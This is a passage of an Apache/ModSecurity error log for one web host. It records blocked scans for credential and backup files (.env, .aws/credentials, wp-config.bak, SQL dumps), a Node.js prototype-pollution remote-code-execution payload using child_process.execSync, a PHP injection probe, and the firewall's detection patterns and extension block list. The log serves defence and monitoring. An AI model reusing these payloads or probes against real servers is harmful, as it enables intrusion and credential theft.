.dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aYK9X8S9A8z0dGN8UF_fSwAAAQA"] [Wed Feb 04 05:30:40.607965 2026] [:error] [pid 23343:tid 23362] [client 185.177.72.51:1192] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aYK9YJKzqAe6oIsD2HjjQQAAANE"] [Wed Feb 04 05:30:56.846133 2026] [:error] [pid 23164:tid 23277] [client 185.177.72.51:60604] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aYK9cBXmL5E7aAVROfDtmQAAAIU"] [Wed Feb 04 05:31:01.227259 2026] [:error] [pid 23343:tid 23363] [client 185.177.72.51:60718] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aYK9dZKzqAe6oIsD2HjjgQAAANI"] [Wed Feb 04 05:31:58.376495 2026] [:error] [pid 23159:tid 23228] [client 185.177.72.51:43736] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/log/development.log"] [unique_id "aYK9rh2sCqSTkKC-g_qgbAAAAAY"] [Wed Feb 04 05:31:59.942388 2026] [:error] [pid 23343:tid 23353] [client 185.177.72.51:43790] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/access.log"] [unique_id "aYK9r5KzqAe6oIsD2HjkGgAAAMg"] [Wed Feb 04 05:31:59.948901 2026] [:error] [pid 23343:tid 23365] [client 185.177.72.51:43790] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aYK9r5KzqAe6oIsD2HjkGwAAANQ"] [Wed Feb 04 05:31:59.956296 2026] [:error] [pid 23343:tid 23346] [client 185.177.72.51:43790] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aYK9r5KzqAe6oIsD2HjkHAAAAME"] [Wed Feb 04 05:32:26.084131 2026] [:error] [pid 23160:tid 23274] [client 185.177.72.51:61256] [client 185.177.72.51] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php.ini"] [unique_id "aYK9ypKBGDkDyTFd7LPdgAAAAFI"] [Wed Feb 04 05:38:52.470917 2026] [:error] [pid 11103:tid 11111] [client 195.178.110.132:10898] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.bak"] [unique_id "aYK_TMS9A8z0dGN8UF_jpgAAAQE"] [Wed Feb 04 07:42:04.805402 2026] [core:error] [pid 23343:tid 23352] [client 216.73.216.170:1934] AH10244: invalid URI path (/rss/Iceland-lab%27s-testing-suggests-50%-of-cases-have-no-symptoms/21) [Wed Feb 04 07:58:02.479404 2026] [:error] [pid 11103:tid 11120] [client 195.178.110.132:35902] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/wp-config.bak"] [unique_id "aYLf6sS9A8z0dGN8UF8VUwAAAQo"] [Wed Feb 04 09:05:32.097269 2026] [core:error] [pid 23343:tid 23363] [client 216.73.216.170:27970] AH10244: invalid URI path (/rss/Iceland-lab%27s-testing-suggests-50%-of-cases-have-no-symptoms/21) [Thu Feb 05 00:25:12.730794 2026] [:error] [pid 23159:tid 23229] [client 185.177.72.30:16868] [client 185.177.72.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/env.bak"] [unique_id "aYPHSB2sCqSTkKC-g_oVUwAAAAc"] [Thu Feb 05 03:57:38.399776 2026] [:error] [pid 2383:tid 2452] [client 195.178.110.132:22280] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.bak"] [unique_id "aYP5ElzzCQqwZmExPC-DxwAAAI4"] [Thu Feb 05 06:13:09.374356 2026] [:error] [pid 2564:tid 2578] [client 195.178.110.132:34936] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/wp-config.bak"] [unique_id "aYQY1RJP8RIe7JFfA82zJAAAAMw"] [Thu Feb 05 09:07:24.371816 2026] [core:error] [pid 28044:tid 28069] (5)Input/output error: [client 45.148.10.238:54430] AH00036: access to /.env failed (filesystem path '/home') [Thu Feb 05 09:07:24.374727 2026] [core:error] [pid 2383:tid 2427] (5)Input/output error: [client 45.148.10.238:54444] AH00036: access to /.aws/credentials failed (filesystem path '/home') [Thu Feb 05 09:07:24.389274 2026] [core:error] [pid 2383:tid 2455] (5)Input/output error: [client 45.148.10.238:54454] AH00036: access to /aws.env failed (filesystem path '/home') [Thu Feb 05 10:27:58.953217 2026] [core:error] [pid 28468:tid 28491] (5)Input/output error: [client 74.7.228.10:51792] AH00036: access to /robots.txt failed (filesystem path '/home') [Thu Feb 05 10:42:30.055701 2026] [core:error] [pid 2383:tid 2462] (5)Input/output error: [client 74.7.244.35:45550] AH00036: access to /robots.txt failed (filesystem path '/home') [Thu Feb 05 11:16:03.867390 2026] [core:error] [pid 2382:tid 2440] (5)Input/output error: [client 74.7.228.10:55636] AH00036: access to /robots.txt failed (filesystem path '/home') [Thu Feb 05 11:20:43.494248 2026] [core:error] [pid 28404:tid 28426] (5)Input/output error: [client 74.7.244.35:40264] AH00036: access to /robots.txt failed (filesystem path '/home') [Thu Feb 05 11:35:47.393607 2026] [core:error] [pid 8957:tid 8980] (5)Input/output error: [client 195.178.110.54:54240] AH00036: access to / failed (filesystem path '/home') [Thu Feb 05 20:58:59.579167 2026] [:error] [pid 2161:tid 2239] [client 209.97.161.2:51922] [client 209.97.161.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:_cf_session. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:_cf_session: qaG3thEKL84A4tTVmwEggzKYAsvFvACtuH88xf4eZNL1SAyDNOvKOrQ/cGbs8DMVx520u7WDg2Vx3Tk6rmtzOymfWa7Oj1kTZSUP2CIphSjUxqeVcs1bQ2403LVfjtou1t83QDe0/pW7s/qy7AI8eA6kso+vqRksFZMT5c1HuZbye8rKFWVE3WH23uFFcW/tcIcxs2Z5CXLTqBeUwsF28GloGOzOg1UsJrBTC7gm3dJjUK6NocPWzM//FsZTwmQU1yCF1mnMeVj3tvdmh0xmdtifLkj3zm+hy1oInfG6EwHiB2GmlVSbRQn8P/aLKKiDwPiqKp6+qIZnw/Iqs3tKumI73aqBVl7wqcfOQxtFRi3vArvd0z0I8qz4iJKxH1MF6o/XAOs=--D0H7lehsIveEPE8P--7KK8M1qkshFiiqhJZOCR2g=="] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWAS [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aYToc77D-EufUMyJ0JiFuQAAAJY"], referer: https://cmn.bwk.mybluehost.me//blog//wp-login.php [Thu Feb 05 22:46:51.302613 2026] [:error] [pid 20469:tid 20479] [client 45.148.10.154:33982] [client 45.148.10.154] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aYUBuxdi1kboXjGhUBDUHAAAAQI"] [Thu Feb 05 22:47:18.619042 2026] [autoindex:error] [pid 2161:tid 2224] [client 45.148.10.154:41886] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Feb 05 22:47:46.050777 2026] [:error] [pid 23649:tid 23653] [client 45.148.10.154:46570] [client 45.148.10.154] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aYUB8seX3zZKpcC7g2sEsAAAAUI"] [Fri Feb 06 14:12:46.645927 2026] [:error] [pid 3380:tid 3454] [client 85.11.167.4:59472] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1770379967_7082',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1770379967_708..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aYXaviJ-w8Lv4xeZdOVWPwAAAFc"], referer: https://cms-1.dev-unit.com [Fri Feb 06 14:12:46.754873 2026] [:error] [pid 3797:tid 3826] [client 85.11.167.4:59480] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1770379967',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1770379967',{'timeo..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aYXavlrG6MBA5FWAhmy5oAAAANY"], referer: https://cms-1.dev-unit.com [Sat Feb 07 00:24:47.338152 2026] [:error] [pid 3380:tid 3452] [client 109.205.211.39:51334] [client 109.205.211.39] ModSecurity: Access denied with code 403 (phase 2). String match "HTTP/1.1" at REQUEST_PROTOCOL. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "399"] [id "960020"] [rev "2"] [msg "Pragma Header requires Cache-Control Header for HTTP/1.1 requests."] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-login.php"] [unique_id "aYZqLyJ-w8Lv4xeZdOVmlgAAAFY"], referer: https://www.google.com/ [Sat Feb 07 01:11:17.237581 2026] [authz_core:error] [pid 3380:tid 3438] [client 206.81.24.227:34868] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Feb 07 01:11:18.070907 2026] [authz_core:error] [pid 3380:tid 3418] [client 167.172.232.142:41514] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Feb 07 01:11:31.666329 2026] [:error] [pid 3380:tid 3430] [client 206.81.24.227:39454] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag 